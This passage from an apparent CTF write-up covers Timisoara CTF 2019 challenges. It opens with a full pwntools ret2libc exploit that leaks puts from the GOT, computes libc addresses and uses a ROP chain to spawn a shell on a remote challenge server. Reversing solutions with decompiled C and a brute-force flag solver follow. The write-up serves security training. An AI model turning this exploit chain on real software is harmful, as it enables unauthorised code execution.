Leak the address of <code class="language-plaintext highlighter-rouge">puts</code> using <code class="language-plaintext highlighter-rouge">puts</code> to output the address. Essentially, just call <code class="language-plaintext highlighter-rouge">puts(puts_got)</code>, where <code class="language-plaintext highlighter-rouge">puts_got</code> is the address of <code class="language-plaintext highlighter-rouge">puts</code>in the <code class="language-plaintext highlighter-rouge">GLOBAL OFFSET TABLE (GOT)</code>.</p>
  </li>
  <li>
    <p><strong>Calculate the libc base</strong><br />
Libc base can be calculated using <code class="language-plaintext highlighter-rouge">puts</code> - <code class="language-plaintext highlighter-rouge">puts_offset</code>, where <code class="language-plaintext highlighter-rouge">puts</code> is the leaked address and <code class="language-plaintext highlighter-rouge">puts_offset</code> is the address of <code class="language-plaintext highlighter-rouge">puts</code> in libc.</p>
  </li>
  <li>
    <p><strong>Calculate system and /bin/sh address</strong>  <br />
With libc base value, the address of <code class="language-plaintext highlighter-rouge">system</code> and the string <code class="language-plaintext highlighter-rouge">/bin/sh\x00</code> can be calculated using <code class="language-plaintext highlighter-rouge">libc_base + system_offset</code> and <code class="language-plaintext highlighter-rouge">libc_base + binsh_offset</code> respectively.</p>
  </li>
  <li>
    <p><strong>Call system(/bin/sh)</strong><br />
Overflow the buffer and call <code class="language-plaintext highlighter-rouge">system(/bin/sh)</code>, which executes shell. Before calling <code class="language-plaintext highlighter-rouge">system(/bin/sh)</code>, the <code class="language-plaintext highlighter-rouge">RSI</code> register has to be set to 0, or the call will not work.</p>
  </li>
</ol>

<p>Here’s the final exploit:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">LibcSearcher</span> <span class="kn">import</span> <span class="n">LibcSearcher</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">config</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">"elf"</span> <span class="p">:</span> <span class="s">"./flag_manager01"</span><span class="p">,</span>
    <span class="s">"libc"</span> <span class="p">:</span> <span class="s">"./libc-2.27.so"</span><span class="p">,</span>
    <span class="s">"ld"</span> <span class="p">:</span> <span class="s">"./ld-2.27.so"</span><span class="p">,</span>
    <span class="s">"HOST"</span> <span class="p">:</span> <span class="s">"89.38.208.144"</span><span class="p">,</span>
    <span class="s">"PORT"</span> <span class="p">:</span> <span class="mi">11115</span><span class="p">,</span>
<span class="p">}</span>

<span class="k">def</span> <span class="nf">exploit</span><span class="p">(</span><span class="n">p</span><span class="p">):</span>
	<span class="n">padding</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="mi">88</span>
	<span class="n">main</span> <span class="o">=</span> <span class="n">elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'main'</span><span class="p">]</span>
	<span class="n">puts_got</span> <span class="o">=</span> <span class="n">elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">'puts'</span><span class="p">]</span>
	<span class="n">puts_plt</span> <span class="o">=</span> <span class="n">elf</span><span class="p">.</span><span class="n">plt</span><span class="p">[</span><span class="s">'puts'</span><span class="p">]</span>

	<span class="n">pop_rdi</span> <span class="o">=</span> <span class="n">elf</span><span class="p">.</span><span class="n">search</span><span class="p">(</span><span class="n">asm</span><span class="p">(</span><span class="s">"pop rdi ; ret"</span><span class="p">)).</span><span class="nb">next</span><span class="p">()</span>
	<span class="n">pop_rsi_r15</span> <span class="o">=</span> <span class="n">elf</span><span class="p">.</span><span class="n">search</span><span class="p">(</span><span class="n">asm</span><span class="p">(</span><span class="s">"pop rsi ; pop r15 ; ret"</span><span class="p">)).</span><span class="nb">next</span><span class="p">()</span>

	<span class="n">payload</span> <span class="o">=</span> <span class="n">padding</span> 
	<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rdi</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">puts_got</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">puts_plt</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">main</span><span class="p">)</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Enter your name: "</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Enter password please: "</span><span class="p">,</span> <span class="s">''</span><span class="p">)</span> 

	<span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span>
	<span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span>

	<span class="n">puts</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">().</span><span class="n">strip</span><span class="p">()</span> <span class="o">+</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="o">*</span><span class="mi">2</span><span class="p">)</span>
	<span class="n">base</span> <span class="o">=</span> <span class="n">puts</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'puts'</span><span class="p">]</span>
	<span class="n">system</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'system'</span><span class="p">]</span>
	<span class="n">sh</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">search</span><span class="p">(</span><span class="s">"/bin/sh</span><span class="se">\x00</span><span class="s">"</span><span class="p">).</span><span class="nb">next</span><span class="p">()</span>

	<span class="n">payload</span> <span class="o">=</span> <span class="n">padding</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rdi</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">sh</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rsi_r15</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">system</span><span class="p">)</span>

	<span class="n">sla</span><span class="p">(</span><span class="s">"Enter your name: "</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Enter password please: "</span><span class="p">,</span> <span class="s">''</span><span class="p">)</span>
	 
	<span class="n">lg</span><span class="p">(</span><span class="s">"SYSTEM: "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">system</span><span class="p">))</span>
	<span class="n">lg</span><span class="p">(</span><span class="s">"BASE: "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">base</span><span class="p">))</span>
	<span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">elf</span> <span class="o">=</span> <span class="n">context</span><span class="p">.</span><span class="n">binary</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s">"elf"</span><span class="p">])</span>

    <span class="k">if</span> <span class="s">"libc"</span> <span class="ow">in</span> <span class="n">config</span><span class="p">.</span><span class="n">keys</span><span class="p">()</span> <span class="ow">and</span> <span class="n">config</span><span class="p">[</span><span class="s">"libc"</span><span class="p">]:</span>
        <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s">"libc"</span><span class="p">])</span>

    <span class="k">if</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s">"remote"</span><span class="p">:</span>
        <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s">"HOST"</span><span class="p">],</span> <span class="n">config</span><span class="p">[</span><span class="s">"PORT"</span><span class="p">])</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">if</span> <span class="s">"libc"</span> <span class="ow">in</span> <span class="nb">dir</span><span class="p">():</span> 
            <span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">([</span><span class="n">config</span><span class="p">[</span><span class="s">"ld"</span><span class="p">],</span> <span class="n">config</span><span class="p">[</span><span class="s">"elf"</span><span class="p">]],</span> <span class="n">env</span><span class="o">=</span><span class="p">{</span><span class="s">"LD_PRELOAD"</span> <span class="p">:</span> <span class="n">config</span><span class="p">[</span><span class="s">"libc"</span><span class="p">]})</span>
        <span class="k">else</span><span class="p">:</span> 
            <span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s">"elf"</span><span class="p">])</span>

        <span class="n">pause</span><span class="p">()</span>

    <span class="n">sl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
    <span class="n">sla</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">:</span> <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">)</span>
    <span class="n">r</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span> <span class="n">p</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
    <span class="n">ru</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
    <span class="n">lg</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span> <span class="p">:</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>

    <span class="n">exploit</span><span class="p">(</span><span class="n">p</span><span class="p">)</span>
</code></pre></div></div>

<p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">TIMCTF{d3v_fd_i5_sn3aky_backd00r}</code></p>

<h2 id="pipes-reversing">Pipes (reversing)</h2>

<blockquote>
  <p>The program seems to smoke a lot.</p>
</blockquote>

<p><a href="https://github.com/MiloTruck/CTF-Archive/tree/master/Timisoara%20CTF%202019%20Qualification%20Round/Reversing/Pipes%20%5B200%5D" class="btn btn--primary">Challenge Files</a></p>

<p><strong>Solution</strong></p>

<p>As usual, first we decompile the binary using Ghidra for analysis. The code below are the important parts of the decompilation:</p>

<p><strong>rol</strong> function:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">rol</span><span class="p">(</span><span class="n">uchar</span> <span class="o">*</span><span class="n">character</span><span class="p">,</span><span class="kt">int</span> <span class="n">max</span><span class="p">)</span>

<span class="p">{</span>
  <span class="kt">int</span> <span class="n">i</span><span class="p">;</span>
  
  <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="k">while</span> <span class="p">(</span><span class="n">i</span> <span class="o">&lt;</span> <span class="n">max</span><span class="p">)</span> <span class="p">{</span>
    <span class="o">*</span><span class="n">character</span> <span class="o">=</span> <span class="o">*</span><span class="n">character</span> <span class="o">*</span> <span class="mi">2</span> <span class="o">|</span> <span class="o">*</span><span class="n">character</span> <span class="o">&gt;&gt;</span> <span class="mi">7</span><span class="p">;</span>
    <span class="n">i</span> <span class="o">=</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Part of the code in <strong>main</strong>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>      <span class="n">character</span> <span class="o">=</span> <span class="n">character</span> <span class="o">+</span> <span class="mh">0x60</span><span class="p">;</span>
      <span class="n">rol</span><span class="p">(</span><span class="o">&amp;</span><span class="n">character</span><span class="p">,</span><span class="mi">2</span><span class="p">);</span>
      <span class="n">character</span> <span class="o">=</span> <span class="o">!</span><span class="p">(</span><span class="n">character</span> <span class="o">^</span> <span class="mh">0x7f</span><span class="p">);</span>
      <span class="n">final</span> <span class="o">=</span> <span class="n">character</span> <span class="o">*</span> <span class="mh">0xed</span><span class="p">;</span>
</code></pre></div></div>

<p>As the challenge name suggests, understanding of the C pipe() system call is required to solve this challenge. GeeksforGeeks explained and demonstrated the concept of pipes in C fairly well: <a href="https://www.geeksforgeeks.org/c-program-demonstrate-fork-and-pipe/">https://www.geeksforgeeks.org/c-program-demonstrate-fork-and-pipe/</a></p>

<p>The challenge is quite simple. For every character in the input, it performs mathematical functions such as XOR, OR, NOT and basic arithmetic. It then checks if the final value is equal to the value stored.</p>

<p>To obtain the flag, we can replicate the operations performed on each character in the flag. By brute-forcing every possible character for each position in the flag, we can find out which character matches the value stored in the binary, thus giving us the entire flag.</p>

<p>Here’s final code to solve the challenge:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">a</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0xb2</span><span class="p">,</span> <span class="mh">0x35</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x9a</span><span class="p">,</span> <span class="mh">0xb3</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xa6</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x1f</span><span class="p">,</span> <span class="mh">0xad</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xb6</span><span class="p">,</span> <span class="mh">0xbe</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xb6</span><span class="p">,</span> <span class="mh">0xbe</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x17</span><span class="p">,</span> <span class="mh">0x88</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xa6</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x7f</span><span class="p">,</span> <span class="mh">0x8f</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xd3</span><span class="p">,</span> <span class="mh">0xb0</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xef</span><span class="p">,</span> <span class="mh">0xbb</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xa6</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x87</span><span class="p">,</span> <span class="mh">0xb4</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x9b</span><span class="p">,</span> <span class="mh">0x9a</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x1a</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xcb</span><span class="p">,</span> <span class="mh">0x8b</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xa6</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x9b</span><span class="p">,</span> <span class="mh">0x9a</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x7f</span><span class="p">,</span> <span class="mh">0x8f</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xa6</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x57</span><span class="p">,</span> <span class="mh">0xc3</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xe7</span><span class="p">,</span> <span class="mh">0x96</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xcb</span><span class="p">,</span> <span class="mh">0x8b</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xef</span><span class="p">,</span> <span class="mh">0xbb</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xcb</span><span class="p">,</span> <span class="mh">0x8b</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xa6</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x9b</span><span class="p">,</span> <span class="mh">0x9a</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xa3</span><span class="p">,</span> <span class="mh">0xbf</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xa6</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xb2</span><span class="p">,</span> <span class="mh">0x35</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x9a</span><span class="p">,</span> <span class="mh">0xb3</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xa6</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x87</span><span class="p">,</span> <span class="mh">0xb4</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x2e</span><span class="p">,</span> <span class="mh">0x23</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x87</span><span class="p">,</span> <span class="mh">0xb4</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x5e</span><span class="p">,</span> <span class="mh">0x14</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x73</span><span class="p">,</span> <span class="mh">0xce</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x5e</span><span class="p">,</span> <span class="mh">0x14</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xcb</span><span class="p">,</span> <span class="mh">0x8b</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xaa</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">]</span>
<span class="n">final</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">flag</span> <span class="o">=</span> <span class="s">'TIMCTF{'</span>

<span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">7</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">):</span>
    <span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">j</span><span class="o">-</span><span class="mi">7</span><span class="p">)</span><span class="o">*</span><span class="mi">4</span>
    <span class="n">final</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">a</span><span class="p">[</span><span class="n">q</span><span class="p">])</span>


<span class="k">for</span> <span class="n">val</span> <span class="ow">in</span> <span class="n">final</span><span class="p">:</span>
    <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="mi">127</span><span class="p">):</span>
        <span class="n">test</span> <span class="o">=</span> <span class="n">c</span> <span class="o">+</span> <span class="mh">0x60</span>
        <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">2</span><span class="p">):</span>
            <span class="n">test</span> <span class="o">=</span> <span class="p">(</span><span class="n">test</span> <span class="o">*</span> <span class="mi">2</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">test</span> <span class="o">&gt;&gt;</span> <span class="mi">7</span><span class="p">)</span>

        <span class="n">test</span> <span class="o">^=</span> <span class="mh">0x7f</span>
        <span class="n">test</span> <span class="o">^=</span> <span class="mi">255</span>
        <span class="n">test</span> <span class="o">*=</span> <span class="mh">0xed</span>

        <span class="n">test</span> <span class="o">=</span> <span class="n">test</span> <span class="o">&amp;</span> <span class="mh">0xff</span>
        <span class="k">if</span> <span class="n">test</span>  <span class="o">==</span> <span class="n">val</span><span class="p">:</span>
            <span class="n">flag</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">c</span><span class="p">)</span>

<span class="n">flag</span> <span class="o">+=</span> <span class="s">"}"</span>
<span class="k">print</span> <span class="n">flag</span>

</code></pre></div></div>

<p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">TIMCTF{N0_n33d_for_piPe_if_there_is_N0_pIpEwEeD}</code></p>

<h2 id="strange-jump-reversing">Strange Jump (reversing)</h2>

<blockquote>
  <p>This program likes to jump!</p>
</blockquote>

<p><a href="https://github.com/MiloTruck/CTF-Archive/tree/master/Timisoara%20CTF%202019%20Qualification%20Round/Reversing/Strange%20Jump%20%5B250%5D" class="btn btn--primary">Challenge Files</a></p>

<p><strong>Solution</strong></p>

<p>Using Ghidra to decompile the binary, notice that there are a lot of functions. Most of the functions in the binary are placed to mislead and distract, and can be ignored. To find the function that contains the flag, look for the string <code class="language-plaintext highlighter-rouge">Yay, you got the flag!\n</code>.</p>

<p>Here’s the simplified decompilation of the function:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">alphabets</span> <span class="o">=</span> <span class="s">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"</span>

<span class="kt">int</span> <span class="n">e</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">input_length</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="o">&amp;</span><span class="n">input</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">a</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">a</span> <span class="o">&lt;</span> <span class="n">input_length</span><span class="p">;</span> <span class="n">a</span> <span class="o">+=</span> <span class="mi">3</span><span class="p">){</span>
    <span class="kt">int</span> <span class="n">char_one</span> <span class="o">=</span> <span class="p">(</span><span class="o">&amp;</span><span class="n">input</span><span class="p">)[</span><span class="n">a</span><span class="p">];</span>
    <span class="kt">int</span> <span class="n">char_two</span> <span class="o">=</span> <span class="p">(</span><span class="o">&amp;</span><span class="n">input</span><span class="p">)[</span><span class="n">a</span><span class="o">+</span><span class="mi">1</span><span class="p">];</span>
    <span class="kt">int</span> <span class="n">char_three</span> <span class="o">=</span> <span class="p">(</span><span class="o">&amp;</span><span class="n">input</span><span class="p">)[</span><span class="n">a</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span>
    
    <span class="n">bool</span> <span class="n">check</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">b</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">b</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">;</span> <span class="n">b</span><span class="o">++</span><span class="p">){</span>
        <span class="k">if</span> <span class="p">((</span><span class="o">&amp;</span><span class="n">input</span><span class="p">)[</span><span class="n">a</span><span class="o">+</span><span class="n">b</span><span class="p">]</span> <span class="o">==</span> <span class="s">"</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span> <span class="n">check</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span> 
    <span class="p">}</span>
    
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">c</span> <span class="o">=</span> <span class="mi">3</span><span class="p">;</span> <span class="n">c</span> <span class="o">&gt;</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span> <span class="n">c</span><span class="o">--</span><span class="p">){</span>
        <span class="kt">int</span> <span class="n">t</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">d</span> <span class="o">=</span> <span class="mi">5</span><span class="p">;</span> <span class="n">d</span> <span class="o">&lt;</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span> <span class="n">d</span><span class="o">--</span><span class="p">){</span>
            <span class="k">if</span> <span class="p">((</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="p">(</span><span class="n">d</span><span class="o">+</span><span class="n">c</span><span class="o">*</span><span class="mi">6</span> <span class="o">&amp;</span> <span class="mh">0x1f</span><span class="p">)</span> <span class="o">&amp;</span> <span class="p">((</span><span class="n">char_one</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span> <span class="o">|</span> <span class="n">char_two</span><span class="p">)</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span> <span class="o">|</span> <span class="n">char_three</span><span class="p">))</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">){</span>
                <span class="n">t</span> <span class="o">=</span> <span class="n">t</span> <span class="o">|</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="n">d</span> <span class="o">&amp;</span> <span class="mh">0x1f</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span>
        
        <span class="k">if</span> <span class="p">(</span><span class="n">t</span> <span class="o">==</span> <span class="mi">0</span><span class="p">){</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">check</span> <span class="o">==</span> <span class="nb">true</span><span class="p">)</span> <span class="n">ciphertext</span><span class="p">[</span><span class="n">e</span><span class="p">]</span> <span class="o">==</span> <span class="s">"A"</span><span class="p">;</span>
            <span class="k">else</span> <span class="n">ciphertext</span><span class="p">[</span><span class="n">e</span><span class="p">]</span> <span class="o">==</span> <span class="s">"="</span><span class="p">;</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="n">ciphertext</span><span class="p">[</span><span class="n">e</span><span class="p">]</span> <span class="o">==</span> <span class="n">alphabets</span><span class="p">[</span><span class="n">t</span><span class="p">];</span>
        <span class="p">}</span>
        
        <span class="n">e</span> <span class="o">+=</span> <span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="n">ciphertext_length</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">final_length</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="o">&amp;</span><span class="n">final</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ciphertext_length</span> <span class="o">==</span> <span class="n">final_length</span><span class="p">){</span>
    <span class="kt">int</span> <span class="n">a</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">while</span> <span class="p">(</span><span class="nb">true</span><span class="p">){</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">final</span><span class="p">[</span><span class="n">a</span><span class="p">]</span> <span class="o">==</span> <span class="s">"</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Yay! You got the flag!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">final</span><span class="p">[</span><span class="n">a</span><span class="p">]</span> <span class="o">!=</span> <span class="n">ciphertext</span><span class="p">[</span><span class="n">a</span><span class="p">])</span> <span class="k">break</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

